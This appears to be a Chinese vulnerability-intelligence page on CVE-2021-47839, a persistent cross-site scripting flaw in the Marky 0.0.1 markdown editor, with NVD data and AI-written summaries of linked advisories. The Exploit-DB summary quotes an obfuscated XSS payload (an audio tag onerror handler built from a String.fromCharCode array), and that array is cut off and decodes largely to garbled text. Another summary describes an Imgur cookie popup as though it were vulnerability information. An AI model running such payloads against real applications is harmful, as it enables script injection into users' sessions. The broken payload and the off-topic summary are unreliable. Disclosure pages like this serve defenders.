一、 漏洞 CVE-2021-47839 基础信息
漏洞信息
# Marky 0.0.1 持久化XSS漏洞
N/A
神龙判断
是否为 Web 类漏洞: 未知
判断理由:
N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
Marky 0.0.1 - Persistent Cross-Site Scripting
来源:美国国家漏洞数据库 NVD
漏洞描述信息
Marky 0.0.1 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts into markdown files. Attackers can upload crafted markdown files with embedded JavaScript payloads that execute when the file is opened, potentially enabling remote code execution.
来源:美国国家漏洞数据库 NVD
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
来源:美国国家漏洞数据库 NVD
漏洞类别
在Web页面生成时对输入的转义处理不恰当(跨站脚本)
来源:美国国家漏洞数据库 NVD
二、漏洞 CVE-2021-47839 的公开POC
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
三、漏洞 CVE-2021-47839 的情报信息
标题: Marky 0.0.1 - Persistent Cross-Site Scripting - Multiple webapps Exploit -- 🔗来源链接
标签:exploit
神龙速读:## 漏洞关键信息 - **EDB-ID:** 49831 - **CVSS:** N/A - **Author:** TaurusOmar - **Type:** WEBAPPS - **Platform:** MULTIPLE - **Date:** 2021-05-05 - **Vulnerable App:** Marky 0.0.1 ### Exploit Details - **Title:** Marky 0.0.1 - Persistent Cross-Site Scripting - **Author:** TaurusOmar - **Date:** 2021-05-04 - **CVSS:** 3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - **Risk:** High (8.8) - **Vendor Homepage:** https://github.com/vesparny/marky - **Version:** 0.0.1 - **Tested on:** Linux, MacOS, Windows ### Description Marky is an editor for markdown with a friendly interface that allows you to view, edit and load files (.md). Marky is still under development. You can download the latest version from the releases page. ### Payload ```html <audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,115,114,110,61,34,69,118,97,108,34,34,99,104,34,104,116,116,112,58,97,110,47,47,34,44,32,57,40,50,41,94,114,101,118,101,114,40,40,40,40,44,173,51,56,52,105,108,99,108,105,100,101,40,40,44,48,48,48,48,48,53,56,44,44,44,48,58,48,58,117,110,112,55,44,44,32,43,44,43,43,43,43,43,43,46,46,44,44,48,44,40,40,43,44,40,91,93,40,44,40,93,93,40,44,41,40,44,32,93,53,44,97,32,62,44,46,44,48,57,48,62,44,48,48,44,40,51,44,48,44,46,44,34,93,34,91,59,44,57,36,61,41,43,61,44,63,41,40,44,36,44,61,61,62,41,38,32,38,34,38,32,41,105,38,40,44,44,44,55,37,49,40,34,34,37,34,34,32,58,34,34,40,40,108,44,57,39,39,34,39,34,55,38,92,43,43,49,36,40,44,35,40,44,34,34,62,36,40,53,125,125,41,96,41,41,94,37,100,44,61,114,101,118,101,114,40,94,40,43,60,35,63,40,53,37,34,36,35,34,63,40,53,47,44,96,44,44,46,33,113,40,40,43,63,36,44,48,40,44,40,34,34,34,32,59,40,41,97,32,62,44,46,44,40,62,44,40,61,44,38,46,33,44,44,61,97,32,62,44,46,44,40,62,44,40,61,44,38,46,33,44,44,61,97,32,62,44,46,44,40,62,44,4 ```
标题: - GIF - Imgur -- 🔗来源链接
标签:exploit
神龙速读:从这张网页截图中获取到的关于漏洞的关键信息如下: * **Imgur的隐私政策弹窗**:显示了Imgur网站的隐私政策弹窗,要求用户同意使用个人数据用于个性化广告、内容定制、广告和内容测量、受众研究以及服务开发。 * **数据存储和访问**:弹窗中提到存储和/或访问设备上的信息,包括cookies、唯一标识符和其他设备数据。 * **供应商信息**:弹窗中提到与168个TCF供应商和80个广告合作伙伴共享数据。 * **用户选项**:提供了“管理选项”和“同意”两个按钮,用户可以选择管理自己的隐私和cookie设置。 * **数据处理依据**:提到一些供应商可能基于合法利益处理个人数据,用户可以通过管理选项来反对这一处理。 这些信息表明,Imgur在处理用户数据时遵循了一定的隐私政策和数据保护措施,用户有权选择是否同意这些数据处理活动。然而,具体的漏洞信息并未直接显示在截图中。
标题: GitHub - vesparny/marky: A markdown editor built with Electron and React -- 🔗来源链接
标签:product
神龙速读:### 漏洞关键信息 - **存档状态**: 仓库已被存档,最后提交于2019年6月20日,仅可读。 - **已知问题**(Issues): 仓库内有5个已知问题。 - **项目活动**: - 最后一次提交:8年前 - 46次提交记录 - **技术栈与开发语言**: - 建立在Electron和React的基础上 - 使用JavaScript(占比94.2%)为主要开发语言 - **安全考虑**: - 项目未提及具体的安全审查和漏洞报告流程 - 已知的依赖项安全性状态未提供明确信息(如图中的 Dependency status 显示红色就表示未找到或过期).
标题: Marky 0.0.1 - Persistent Cross-Site Scripting | Advisories | VulnCheck -- 🔗来源链接
标签:third-party-advisory
神龙速读:### 关键信息 - **漏洞名称**: Marky 0.0.1 - Persistent Cross-Site Scripting - **严重程度**: Medium - **发布时间**: January 16, 2026 - **受影响版本**: Marky 0.0.1 - **CVE编号**: N/A - **CWE编号**: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - **CVSS评分**: 5.4 - **CVSS向量**: AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N - **相关链接**: - exploitDB-49831 - Marky GitHub Repository - Proof of Concept Video - **发现者**: TaurusOmar - **描述**: Marky 0.0.1 存在持久性跨站脚本漏洞,允许攻击者在 markdown 文件中注入恶意脚本。通过上传包含嵌入式 JavaScript 代码的 markdown 文件,在文件打开时执行,可能实现远程代码执行。
- https://nvd.nist.gov/vuln/detail/CVE-2021-47839
四、漏洞 CVE-2021-47839 的评论
暂无评论